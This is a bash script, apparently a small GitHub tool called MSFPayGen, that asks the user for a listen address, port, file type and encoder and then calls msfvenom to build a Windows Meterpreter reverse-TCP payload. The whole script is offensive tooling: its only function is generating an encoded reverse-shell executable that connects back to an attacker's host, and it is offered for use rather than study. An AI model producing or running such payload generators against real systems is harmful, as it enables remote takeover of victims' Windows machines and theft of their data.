#!/bin/bash
cyan='\e[0;36m'
green='\e[0;34m'
okegreen='\033[92m'
lightgreen='\e[1;32m'
white='\e[1;37m'
red='\e[1;31m'
yellow='\e[1;33m'
BlueF='\e[1;34m' #Biru
RESET="\033[00m" #normal
#installing prequisite
apt-get install figlet
clear
#checking if the input is correct
check ()
{
cat << !
  Generate Hexadecimal Input
  +------------++-------------------------++-----------------------+
  | Name       ||  Descript               || Your Input
  +------------++-------------------------++-----------------------+
  | LHOST      ||  The Listen Address     || $yourip
  | LPORT      ||  The Listen Ports       || $yourport
  | OUTPUTNAME ||  The Filename output    || $fira
  | ENCODER    ||  The Encoder            || $encode
  | FILETYPE   ||  The Payload File Type  || $filetype
  +------------++-------------------------++-----------------------+
!
}

#menu
echo ""
echo -e $okegreen "[---] MSFPayGen - Automated Metasploit Payload Generator [---] "
echo -e $okegreen "      [---Generate Metasploit Payload Using MSFVenom---] "
figlet MSFPayGen
echo -e $okegreen "[---] Tools Programmed By GetRektBoy724 [---] "
echo -e $okegreen "[---]       Codename : Automated        [---] "
echo -e $okegreen "[---]          Version : v1.5           [---] "
echo -e $red "YOU SHOULD HAVE METASPLOIT FRAMEWORK INSTALLED!!!"
echo -e $okegreen "If You Want To Quit The Program...Just Press control-c!!"
echo -e $okegreen " Please Fill This Form First!!"
echo -e $okegreen "[-----------------------------]"
echo -ne $BlueF "SET PAYLOAD FILE TYPE : ";tput sgr0
read filetype
echo -e $BlueF " [--------------------] "
echo -ne $BlueF "SET LHOST : ";tput sgr0
read yourip
echo -e $BlueF " [--------------------] "
echo -ne $BlueF "SET LPORT : ";tput sgr0
read yourport
echo -e $BlueF " [--------------------] "
echo -ne $BlueF "Base Name For Output File With Extension : ";tput sgr0
read fira
echo -e $BlueF " [--------------------] "
echo -ne $BlueF "Encoders : ";tput sgr0
read encode
echo -e $BlueF " [--------------------] "
check
echo -e $red "Please Wait..This Gonna Take A Few Minute!"
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$yourip LPORT=$yourport -e $encode -b '/x00' -f $filetype> $fira
clear
echo -e $yellow "[---------------------------------------------] "
echo -e $yellow "[---] The File Has Been Maked By MSFVenom!!! [---] "
echo -e $okegreen "[---]Thank You For Using This Tool....If There Is A Problem Or Bug,Feel Free To Report At https://github.com/GetRektBoy724/MSFPayGen/issues [---]"
figlet GoodBye

